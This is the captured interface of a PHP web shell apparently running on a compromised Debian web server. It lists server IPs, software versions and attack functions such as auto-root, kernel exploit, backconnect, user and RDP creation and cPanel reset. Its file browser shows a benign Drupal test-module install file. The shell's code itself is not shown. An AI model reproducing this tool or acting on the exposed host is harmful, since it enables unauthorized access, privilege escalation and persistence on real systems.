Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.21.105.46
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
rdf /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
rdf_test.info
270
B
-rw-r--r--
rdf_test.install
472
B
-rw-r--r--
rdf_test.module
1.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rdf_test.install
<?php /** * @file * Install, update and uninstall functions for the rdf module. */ /** * Implements hook_install(). */ function rdf_test_install() { $rdf_mappings = array( array( 'type' => 'node', 'bundle' => 'test_bundle_hook_install', 'mapping' => array( 'rdftype' => array('foo:mapping_install1', 'bar:mapping_install2'), ), ), ); foreach ($rdf_mappings as $rdf_mapping) { rdf_mapping_save($rdf_mapping); } }
Close